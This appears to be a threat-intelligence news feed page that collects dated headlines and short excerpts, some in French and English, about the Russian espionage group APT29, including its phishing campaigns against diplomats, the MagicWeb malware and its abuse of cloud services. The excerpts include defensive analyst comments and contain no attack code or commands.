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SocRadar.webp 2023-03-17 07:22:00 APT Profile: Cozy Bear / APT29 (lien direct) >Advanced Persistent Threat (APT) groups are widely classified as organizations that lead “attacks on a... Threat Guideline APT 29 APT 29 ★★
RecordedFuture.webp 2023-03-14 22:00:00 Kremlin-backed hackers blamed in recent phishing attempts on EU agencies (lien direct) A Russian state-backed hacker group known as Nobelium is behind recent attempted cyberattacks on diplomatic entities and government agencies in the European Union, cybersecurity researchers say. In a campaign identified in early March, the hackers sent phishing emails with content related to diplomatic relations between Poland and the U.S., according to a report by cybersecurity Hack APT 29 ★★★
SecurityWeek.webp 2023-01-30 12:03:49 Russia-Linked APT29 Uses New Malware in Embassy Attacks (lien direct) >Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks. Malware APT 29 ★★
globalsecuritymag.webp 2022-11-17 00:00:00 Mustang Panda, APT29, APT36, Phobos, Cobalt Strike : Les acteurs émergents de la cybermenace se structurent et les rançongiciels évoluent (lien direct) Mustang Panda, APT29, APT36, Phobos, Cobalt Strike : Les acteurs émergents de la cybermenace se structurent et les rançongiciels évoluent Le Trellix Advanced Research Center dévoile son premier rapport faisant le point sur l'activité des menaces cyber - Malwares APT 29 APT 36
SecurityAffairs.webp 2022-11-10 10:41:13 APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity (lien direct) >Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity. Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy Bear, Nobelium, and The Dukes) successfully phished a European diplomatic entity. The attack stands out for the use of the Windows Credential […] APT 29
The_Hackers_News.webp 2022-11-09 19:17:00 APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network (lien direct) The Russia-linked APT29 nation-state actor has been found leveraging a "lesser-known" Windows feature called Credential Roaming as part of its attack against an unnamed European diplomatic entity. "The diplomatic-centric targeting is consistent with Russian strategic priorities as well as historic APT29 targeting," Mandiant researcher Thibault Van Geluwe de Berlaere said in a technical write-up. APT 29
Mandiant.webp 2022-11-08 15:00:00 Ils me voient itinérants: suivant APT29 en jetant un aperçu plus approfondi de l'itinérance des informations d'identification Windows
They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming
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Au début de 2022, Mandiant a détecté et répondu à un incident où l'APT29 a réussi une entité diplomatique européenne et a finalement abusé de la fonction d'itinérance des informations d'identification Windows.Le ciblage diplomatique centré sur le diplomate est conforme aux priorités stratégiques russes ainsi qu'aux historique APT 29 APT 29 ★★★★
2022-10-18 08:41:18 The benefits of taking an intent-based approach to detecting Business Email Compromise (lien direct) By Abhishek Singh.BEC is a multi-stage attack. Adversaries first identify targets, then they establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets.  A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach for every employee in a large organization is a challenge.  Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit.  Detection of exploitation techniques such as lookalike domains and any differences in the email addresses in the "From" and "Reply-to" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent.  The intent-based approach detects BEC and then classifies it into the type of scam. It catches BEC messages, irrespective of whether a threat actor is impersonating a C-level executive or any employee in an organization. Classification based on the type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. The additional information will further assist in better designing preventive features to stop BEC. Business email compromise (BEC) is one of the most financially damaging online crimes. As per the internet crime 221 report, the total loss in 2021 due to BEC is around 2.4 billion dollars. Since 2013, BEC has resulted in a 43 billion dollars loss. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully. There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages. Before we get too deep into the intent-based model, take a deeper look at the commonly used approaches to block BEC from the simplistic through machine learning (ML) approaches. Policy-based detection The first place to start is with policy-based detection as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email.  Threat Medical Cloud Yahoo Uber APT 38 APT 37 APT 29 APT 19 APT 15 APT 10
Anomali.webp 2022-08-30 15:01:00 Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Authentication, DDoS, Fingerprinting, Iran, North Korea, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence LastPass Hackers Stole Source Code (published: August 26, 2022) In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022) Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 | Ransomware Hack Tool Vulnerability Threat Guideline Cloud APT 37 APT 29 LastPass
globalsecuritymag.webp 2022-08-26 10:36:26 Le groupe APT29 continue de cibler Microsoft 365 (lien direct) APT29 est un groupe d'espionnage russe que Mandiant suit depuis au moins 2014 et probablement parrainé par le Service de renseignement extérieur (SVR). Mandiant continue d'identifier des opérations de du groupe APT29 visant les intérêts des États-Unis, ainsi que ceux de l'OTAN. Malgré la médiatisation de multiples opérations d' APT29, celles-ci continuent d'être extrêmement prolifiques. - Malwares APT 29
SecurityAffairs.webp 2022-08-25 17:11:38 Nobelium APT uses new Post-Compromise malware MagicWeb (lien direct) >Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments.  The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […] Malware Threat APT 29
bleepingcomputer.webp 2022-08-25 12:36:49 Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows (lien direct) Microsoft has discovered a new malware used by the Russian hacker group APT29 (a.k.a. NOBELIUM, Cozy Bear) that enables authentication as anyone in a compromised network. [...] Malware APT 29 ★★★
SecurityWeek.webp 2022-08-25 10:16:06 Microsoft Details New Post-Compromise Malware Used by Russian Cyberspies (lien direct) Microsoft this week published technical details on 'MagicWeb', a new post-exploitation tool used by Russia-linked cyberespionage group APT29. Malware Tool APT 29
SecurityAffairs.webp 2022-08-19 23:20:33 Russia-linked Cozy Bear uses evasive techniques to target Microsoft 365 users (lien direct) >Russia-linked APT group Cozy Bear continues to target Microsoft 365 accounts in NATO countries for cyberespionage purposes. Mandiant researchers reported that the Russia-linked Cozy Bear cyberespionage group (aka APT29, CozyDuke, and Nobelium), has targeted Microsoft 365 accounts in espionage campaigns. The experts pointed out that APT29 devised new advanced tactics, techniques, and procedures to evade detection. […] APT 29
bleepingcomputer.webp 2022-08-19 11:10:55 Russian APT29 hackers abuse Azure services to hack Microsoft 365 users (lien direct) The state-backed Russian cyberespionage group Cozy Bear has been particularly prolific in 2022, targeting Microsoft 365 accounts in NATO countries and attempting to access foreign policy information. [...] Hack APT 29
Mandiant.webp 2022-08-18 09:00:00 Vous ne pouvez pas m'auditer: APT29 continue de cibler Microsoft 365
You Can\\'t Audit Me: APT29 Continues Targeting Microsoft 365
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apt29 est un groupe d'espionnage russe que Mandiant suit depuis au moins 2014 et est probablement Parrainé par le Foreign Intelligence Service (SVR).Mandiant continue d'identifier les opérations APT29 ciblant les intérêts des États-Unis et les pays des États-Unis et ceux des pays de l'OTAN et des pays partenaires.Malgré la publication de multiples opérations APT29, ils continuent d'être extrêmement prolifiques.En 2022, APT29 s'est concentré sur les organisations responsables de l'influence et de l'élaboration de la politique étrangère des pays de l'OTAN.Cela a inclus plusieurs cas où APT29 a revisité les victimes qu'ils avaient compromis des années
APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). Mandiant continues to identify APT29 operations targeting the United States\' (US) interests, and those of NATO and partner countries. Despite the publicization of multiple APT29 operations, they continue to be extremely prolific. In 2022, APT29 has focused on organizations responsible for influencing and crafting the foreign policy of NATO countries. This has included multiple instances where APT29 revisited victims they had compromised years
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Anomali.webp 2022-07-26 17:10:00 Anomali Cyber Watch: Cozy Bear Abuses Google Drive API, Complex Lightning Framework Targets Linux, Google Ads Hide Fraudulent Redirects, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Bots, China, Linux, Malspam, Mobil, Russia, and Spearhishing. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Lightning Framework: New Undetected “Swiss Army Knife” Linux Malware (published: July 21, 2022) Intezer researchers discovered a new Linux malware called Lightning Framework (Lightning). It is a modular framework able to install multiple types of rootkits and to run various plugins. Lightning has passive and active capabilities for communication with the threat actor, including opening up SSH service via an OpenSSH daemon, and a polymorphic command and control (C2) configuration. Lightning is a newly discovered threat, and there is no information about its use in the wild and the actors behind it. Analyst Comment: Defenders should block known Lightning indicators. Monitor for file creation based on the Lightning naming convention. MITRE ATT&CK: [MITRE ATT&CK] Logon Scripts - T1037 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Network Service Scanning - T1046 | [MITRE ATT&CK] Network Sniffing - T1040 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: Lightning Framework, Linux, Lightning.Downloader, Lightning.Core, Typosquatting, Masquerading, Timestomping, Port:33229 Google Ads Lead to Major Malvertising Campaign (published: July 20, 2022) Malwarebytes researchers discovered a malvertising campaign abusing Google Search advertisements for popular keywords such as “amazon,” “fac Malware Tool Threat Guideline APT 29
itsecurityguru.webp 2022-07-21 10:13:51 Russian Adversaries Target Google Drive and DropBox in Latest Campaign (lien direct) Russian adversaries are taking advantage of trusted cloud services, like Google Drive and DropBox, to deliver malware to businesses and governments, according to new research. Researchers at Palo Alto Networks Unit 42 wrote that the threat actor Cloaked Ursula – AKA the Russian government-linked APT29 or Cozy Bear – is increasingly using online storage services […] Malware Threat APT 29
The_Hackers_News.webp 2022-07-19 21:03:48 Russian Hackers Using DropBox and Google Drive to Drop Malicious Payloads (lien direct) The Russian state-sponsored hacking collective known as APT29 has been attributed to a new phishing campaign that takes advantage of legitimate cloud services like Google Drive and Dropbox to deliver malicious payloads on compromised systems. "These campaigns are believed to have targeted several Western diplomatic missions between May and June 2022," Palo Alto Networks Unit 42 said in a Tuesday APT 29
SecurityAffairs.webp 2022-07-19 13:41:49 Russia-linked APT29 relies on Google Drive, Dropbox to evade detection (lien direct) >Russia-linked threat actors APT29 are using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google Drive cloud storage service to evade detection. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least […] Threat APT 29
globalsecuritymag.webp 2022-07-19 11:00:58 Les pirates russes APT29 utilisent les services de stockage en ligne, DropBox et Google Drive (lien direct) Dans le monde entier, des entreprises font confiance à des services de stockage tels que DropBox et Google Drive pour leurs opérations quotidiennes. Cette confiance est pourtant mise à mal par des acteurs malveillants qui, comme le montrent les dernières recherches, de l'Unit 42 (cabinet de conseil, unité de recherches et d'analyses sur les menaces cyber de Palo Alto Networks) redoublent d'ingéniosité pour exploiter la situation au profit d'attaques extrêmement difficiles à détecter et à prévenir. (...) - Malwares APT 29
CS.webp 2022-07-19 10:00:00 Russian hacking unit Cozy Bear adds Google Drive to its arsenal, researchers say (lien direct) >APT29, one of the SVR's most active and successful hacking groups, has been using the cloud service to help deliver malware, the researchers said. APT 29
Anomali.webp 2022-07-11 22:59:00 Anomali Cyber Watch: Brute Ratel C4 Framework Abused to Avoid Detection, OrBit Kernel Malware Patches Linux Loader, Hive Ransomware Gets Rewritten, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, Cyberespionage, India, Malspam, Ransomware, Russia, Spearhishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs (published: July 7, 2022) SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email containing Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs were dropping the Bisonal backdoor remote access trojan (RAT). Besides targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut). Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798 OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow (published: July 6, 2022) Intezer researchers describe a new Linux malware dubbed OrBit, that was fully undetected at the time of the discovery. This malware hooks functions and adds itself to all running processes, but it doesn’t use LD_PRELOAD as previously described Linux threats. Instead it achieves persistence by adding the path to the malware into the /etc/ld.so.preload and by patching the binary of the loader itself so it will load the malicious shared object. OrBit establishes an SSH connection, then stages and infiltrates stolen credentials. It avoids detection by multiple functions that show running processes or network connections, as it hooks these functions and filters their output. Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables. MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | Ransomware Malware Tool Vulnerability Threat Patching APT 29
News.webp 2022-07-06 05:27:10 Near-undetectable malware linked to Russia\'s Cozy Bear (lien direct) The fun folk who attacked Solar Winds using a poisoned CV and tools from the murky world of commercial hackware Palo Alto Networks' Unit 42 threat intelligence team has claimed that a piece of malware that 56 antivirus products were unable to detect is evidence that state-backed attackers have found new ways to go about the evil business.… Malware Tool Threat APT 29
Anomali.webp 2022-05-10 17:08:00 Anomali Cyber Watch: Moshen Dragon Abused Anti-Virus Software, Raspberry Robin Worm Jumps from USB, UNC3524 Uses Internet-of-Things to Steal Emails, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Phishing, Ransomware, Sideloading, and Ukraine. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE (published: May 9, 2022) CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is of high severity (CVSSv3 score is 9.8). By May 6, 2022, multiple researchers have developed proof-of concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022. Analyst Comment: Update your vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations available: block iControl REST access through the self IP address and through the management interface, modify the BIG-IP httpd configuration. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication Mobile Subscription Trojans and Their Little Tricks (published: May 6, 2022) Kaspersky researchers analyzed five Android trojans that are secretly subscribing users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Store under different names. To avoid detection, malicious functionality won’t start until the trojan checks that it is available in the store. The malicious payload is split in up to four files. It can block or substitute anti-fraud scripts, and modify X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, MobOk trojan, has additional functionality to bypass captcha. MobOk was seen in a malicious app in Google Store, but the most common infection vector is being spread by other Trojans such as Triada. Analyst Comment: Limit your apps to downloads from the official stores (Google Store for Android), avoid new apps with low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting it too many permissions if those are not crucial to the app alleged function. Monitor your balance and subscription list. MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565 Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH Raspberry Robin Gets the Worm Early (published: May 5, 2022) Since September 2021, Red Canary researchers monitor Raspberry Robin, a new worm Ransomware Malware Tool Vulnerability Threat APT 29 APT 28 ★★★
knowbe4.webp 2022-05-05 13:08:59 Cozy Bear Goes Typosquatting (lien direct) Cozy Bear Goes Typosquatting Researchers at Recorded Future's Insikt Group warn that the Russian threat actor NOBELIUM (also known as APT29 or Cozy Bear) is using typosquatting domains to target the news and media industries with phishing pages. Threat APT 29
TechRepublic.webp 2022-05-03 15:43:28 Russian hacker group APT29 targeting diplomats  (lien direct) The state-supported group behind the SolarWinds supply chain attack is going after diplomats using spear phishing to deploy a novel strain of malware. APT 29
SecurityWeek.webp 2022-05-03 10:08:45 Russian Cyberspies Target Diplomats With New Malware (lien direct) Russian cyberespionage group APT29 has been observed using new malware and techniques in phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia, Mandiant reports. Malware APT 29
Mandiant.webp 2022-05-02 09:30:00 UNC3524: Eye Spy sur votre e-mail
UNC3524: Eye Spy on Your Email
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Mise à jour (novembre 2022): Nous avons fusionné UNC3524 avec APT29. L'activité UNC3524 décrite dans ce post est désormais attribuée à APT29. Depuis décembre 2019, Mandiant a observé que les acteurs avancés des menaces augmentent leur investissement dans des outils pour faciliter la collecte de courriels en vrac dans les environnements de victime, en particulier en ce qui concerne leur soutien aux objectifs d'espionnage présumés.Les e-mails et leurs pièces jointes offrent une riche source d'informations sur une organisation, stockée dans un emplacement centralisé pour les acteurs de menace à collecter.La plupart des systèmes de messagerie, qu'ils soient sur site ou dans le cloud, offrent
UPDATE (November 2022): We have merged UNC3524 with APT29. The UNC3524 activity described in this post is now attributed to APT29. Since December 2019, Mandiant has observed advanced threat actors increase their investment in tools to facilitate bulk email collection from victim environments, especially as it relates to their support of suspected espionage objectives. Email messages and their attachments offer a rich source of information about an organization, stored in a centralized location for threat actors to collect. Most email systems, whether on-premises or in the cloud, offer
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SecurityAffairs.webp 2022-05-02 05:34:39 Russia-linked APT29 targets diplomatic and government organizations (lien direct) Russia-linked APT29 (Cozy Bear or Nobelium) launched a spear-phishing campaign targeting diplomats and government entities. In mid-January 2022, security researchers from Mandiant have spotted a spear-phishing campaign, launched by the Russia-linked APT29 group, on targeting diplomats and government entities. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least 2014, […] APT 29
The_Hackers_News.webp 2022-05-02 04:40:01 Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia (lien direct) A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium ( Threat APT 29
Mandiant.webp 2022-04-28 12:00:00 Trello de l'autre côté: suivi des campagnes de phishing APT29
Trello From the Other Side: Tracking APT29 Phishing Campaigns
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Depuis le début de 2021, Mandiant suit les vastes campagnes de phishing APT29 ciblant les organisations diplomatiques en Europe, les Amériques et l'Asie.Ce billet de blog traite de nos récentes observations liées à l'identification de deux nouvelles familles de logiciels malveillants en 2022, Beatdrop et Boommic, ainsi que les efforts d'APT29 \\ pour échapper à la détection par réorganisation et abus du service Trello d'Atlassian \\. apt29 est un groupe d'espionnage russe que Mandiant suit depuis au moins 2014 et est probablement Parrainé par le Foreign Intelligence Service (SVR).Le ciblage diplomatique centré sur ce récent
Since early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29\'s efforts to evade detection through retooling and abuse of Atlassian\'s Trello service. APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent
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Mandiant.webp 2022-04-27 09:00:00 Assemblage de la poupée de nidification russe: UNC2452 a fusionné dans APT29
Assembling the Russian Nesting Doll: UNC2452 Merged into APT29
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Mandiant a recueilli des preuves suffisantes pour évaluer que l'activité a suivi comme unc2452, le nom de groupe utilisé pour suivre le Solarwinds Compromis en décembre 2020 , est attribuable à APT29. Cette conclusion correspond aux instructions d'attribution précédemment faites par le u.s.Gouvernement que le compromis de la chaîne d'approvisionnement de Solarwinds a été réalisé par APT29, un groupe d'espionnage basé en Russie évalué comme parrainé par le Russian Foreign Intelligence Service (SVR).Notre évaluation est basée sur des données de première main recueillies par Mandiant et est le résultat d'une comparaison et d'une revue approfondies de UNC2452 et de notre Solardwinds APT 29 APT 29 ★★★
knowbe4.webp 2022-04-18 12:42:15 “Being Annoying” as a Social Engineering Approach (lien direct) “Being Annoying” as a Social Engineering Approach in MFA Attacks Attackers are spamming multifactor authentication (MFA) prompts in an attempt to irritate users into approving the login, Ars Technica reports. Both criminal and nation-state actors are using this technique. Researchers at Mandiant observed the Russian state-sponsored actor Cozy Bear launching repeated MFA prompts until the user accepted the request. APT 29 APT 29
Chercheur.webp 2022-04-01 11:12:27 Bypassing Two-Factor Authentication (lien direct) These techniques are not new, but they’re increasingly popular: …some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear. In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection. […] Methods include: Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop. ... Threat APT 29
ArsTechnica.webp 2022-03-19 10:45:49 Leaked ransomware documents show Conti helping Putin from the shadows (lien direct) Hacker gang sometimes acts in Russia's interest, with ad hoc links to FSB, Cozy Bear. Ransomware APT 29
Fortinet.webp 2022-03-15 13:20:59 (Déjà vu) Additional Wiper Malware Deployed in Ukraine #CaddyWiper (lien direct) FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found by security researchers today at ESET. The wiper is dubbed CaddyWiper. Preliminary analysis reveals that the wiper malware erases user data and partition information from attached drives. According to the tweet, CaddyWiper does not share any code with HermeticWiper or IsaacWiper or any known malware families.This is a breaking news event. More information will be added when relevant updates are available.For further reference about Ukrainian wiper attacks please reference our Threat Signal from January and February. Also, please refer to our recent blog that encompasses the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate.Is this the Work of Nobelium/APT29?At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity. Was this Sample Signed?No. Unlike the HermeticWiper sample related to Ukrainian attacks, this sample is unsigned.Why is Malware Signed?Malware is often signed by threat actors as a pretense to evade AV or any other security software. Signed malware allows threat actors to evade and effectively bypass detection, guaranteeing a higher success rate. What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:W32/CaddyWiper.NCX!tr Malware Threat APT 29
Anomali.webp 2022-02-25 00:05:00 Anomali Threat Research Provides Russian Cyber Activity Dashboard (lien direct) Russian government-sponsored threat actors recently increased their malicious activities[1], which are aligned with Russia’s attack on Ukraine in February 2022. Russian retaliation for ongoing economic and diplomatic sanctions imposed by many other countries poses a significant risk of further escalation in the cyber sphere. Russian government-sponsored groups are dangerous cyber-actors that are well-resourced and relentless in their attacks, which include espionage, attacks on critical infrastructure, data destruction, and other malicious activities. To assist our customers, Anomali has released a dashboard focused on Russian-origin actors and Russian cyber activity for ThreatStream users, titled “Russian Cyber Activity.” The Anomali Threat Research team preconfigured this custom dashboard  to provide immediate access and visibility into all known Russian government-related indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on Anomali ThreatStream. Russian Cyber Activity is focused on seven threat actor groups: Six groups are well-known Russian advanced persistent threat (APT) groups: Berserk Bear, Cozy Bear (APT29), Fancy Bear (APT28), Gamaredon (Primitive Bear), Turla (Venomous Bear), and Voodoo Bear (Sandworm).  Additionally, we’ve included Evil Corp (Dridex, Indrik Spider) group. Although typically financially motivated, its leader is known to work for Russia’s Federal Security Services (FSB) and has conducted cyber operations on behalf of the Russian government.[2] Anomali customers using ThreatStream, Match, and Lens are able to immediately detect any IOCs present in their environments and quickly consume threat bulletins containing machine-readable IOCs. This enables analysts to quickly operationalize threat intelligence across their security infrastructures, as well as communicate to all stakeholders if and how they have been impacted. Anomali recently added thematic dashboards that respond to significant global events as part of ongoing product enhancements that further automate and speed essential tasks performed by threat intelligence and security operations analysts. In addition to Russian Cyber Activity, ThreatStream customers currently have access to multiple dashboards announced as part of our recent quarterly product release. Customers can easily integrate the Russian Cyber Activity dashboard, among others, in the “+ Add Dashboard” tab in the ThreatStream console: Endnotes [1] “Attack on Ukrainian Government Websites Linked to GRU Hackers,” Bellingcat Investigation Team, accessed February 24, 2022, published February 23, 2022, https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/; Joe Tidy “​​Ukraine crisis: 'Wiper' discovered in latest cyber-attacks,” BBC News, accessed February 24, 2022, published February 24, 2022, https://www.bbc.com/news/technology-60500618. [2] “Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware,” The U.S. Department of the Treasury, accessed February 24, 2022, published December 5, 2019, https://home.treasury.gov/news/press-releases/sm845. Threat Guideline APT 29 APT 29 APT 28
Fortinet.webp 2022-02-23 18:34:00 New Wiper Malware Discovered Targeting Ukrainian Interests (lien direct) FortiGuard Labs is aware of new wiper malware observed in the wild attacking Ukrainian interests. The wiper was found by security researchers today at ESET. Various estimates from both outfits reveal that the malware wiper has been installed on several hundreds of machines within the Ukraine. Cursory analysis reveals that wiper malware contains a valid signed certificate that belongs to an entity called "Hermetica Digital" based in Cyprus. This is a breaking news event. More information will be added when relevant updates are available. For further reference about Ukrainian wiper attacks please reference our Threat Signal from January. Also, please refer to our most recent blog that encompasses the recent escalation in Ukraine, along with salient advice about patch management and why it is important, especially in today's political climate. Is this the Work of Nobelium/APT29?At this time, there is not enough information to correlate this to Nobelium/APT29 or nation state activity. Are there Other Samples Observed Using the Same Certificate?No. Cursory analysis at this time highlights that the Hermetica Digital certificate used by this malware sample is the only one that 